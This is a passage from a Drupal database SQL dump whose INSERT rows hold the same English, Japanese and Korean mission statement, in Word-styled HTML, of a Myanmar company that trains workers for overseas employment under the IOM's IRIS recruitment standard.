Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">양성하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국제 푶준 회사로서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">해외</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">발굴하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">것입니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><o:p></o:p></p>', '', 'full_html'),
('page', 0, 26, 177, 'en', 0, '<p>Our company is established with the aim of creating a company that meets the international standards of ASEAN standards, providing training and employment opportunities to the future youth who want to work abroad according to the current conditions and needs of Myanmar.&nbsp;</p><p>In order to ensure that there is no harm between employers and employees, we are trying to select and produce workers in accordance with the standards of the International Recruitment Integrity System (IRIS) established by the International Organization for Migration (IOM).&nbsp;</p>', '', 'full_html'),
('page', 0, 26, 177, 'ja', 0, '<p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>会社の目標</u></strong></span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">我々はミャンマーの現状を見抜き、海外で働きたい生徒達の訓練、能力の高い生徒達を生み出し、アジアのスタンダード、国際スタンダードに負けない会社になることに目指しております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">会社と労働者の間に損失がないように</span>International Organization for Migration (IOM)<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">が定めた</span>International Recruitment Integrity System(IRIS)<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">に合った基準で管理しております。</span><o:p></o:p><o:p></o:p></p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 26, 177, 'ko', 0, '<p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>회사의</strong></span><span style=\"font-size:14.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>미래</strong></span><span style=\"font-size:14.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>비전</strong></span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">우리</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위대한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">현재</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">상황과</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">따라 외국에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">싶은</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미래의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">청년들에게</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">훈련과</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"mso-fareast-language:KO;\">ASEAN&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">표준</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">,</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국제</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기준에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">부합하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기업을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">만들기</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">설립되었습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용주와</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">근로자</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사이에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">피해가</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">없도록</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국제이주기구</span><span style=\"mso-fareast-language:KO;\">(IOM)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제정한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국제채용청렴제도</span><span style=\"mso-fareast-language:KO;\">(IRIS)&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기준에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">따라</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">근로자를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">선발하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">생산하도록</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">노력하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">목표는 최고의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">인재를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">양성하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국제 푶준 회사로서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">해외</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">발굴하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">것입니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><o:p></o:p></p>', '', 'full_html'),
('page', 0, 26, 179, 'en', 0, '<p>Our company is established with the aim of creating a company that meets the international standards of ASEAN standards, providing training and employment opportunities to the future youth who want to work abroad according to the current conditions and needs of Myanmar.&nbsp;</p><p>In order to ensure that there is no harm between employers and employees, we are trying to select and produce workers in accordance with the standards of the International Recruitment Integrity System (IRIS) established by the International Organization for Migration (IOM).&nbsp;</p>', '', 'full_html'),
('page', 0, 26, 179, 'ja', 0, '<p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>会社の目標</u></strong></span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">我々はミャンマーの現状を見抜き、海外で働きたい生徒達の訓練、能力の高い生徒達を生み出し、アジアのスタンダード、国際スタンダードに負けない会社になることに目指しております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">会社と労働者の間に損失がないように</span>International Organization for Migration (IOM)<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">が定めた</span>International Recruitment Integrity System(IRIS)<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">に合った基準で管理しております。</span><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 26, 179, 'ko', 0, '<p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>회사의</strong></span><span style=\"font-size:14.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>미래</strong></span><span style=\"font-size:14.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>비전</strong></span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">우리</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위대한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">현재</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">상황과</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">따라 외국에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">싶은</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미래의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">청년들에게</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">훈련과</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"mso-fareast-language:KO;\">ASEAN&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">표준</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">,</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국제</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기준에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">부합하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기업을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">만들기</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">설립되었습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용주와</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">근로자</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사이에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">피해가</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">없도록</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국제이주기구</span><span style=\"mso-fareast-language:KO;\">(IOM)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제정한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국제채용청렴제도</span><span style=\"mso-fareast-language:KO;\">(IRIS)&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기준에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">따라</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">근로자를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">선발하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun 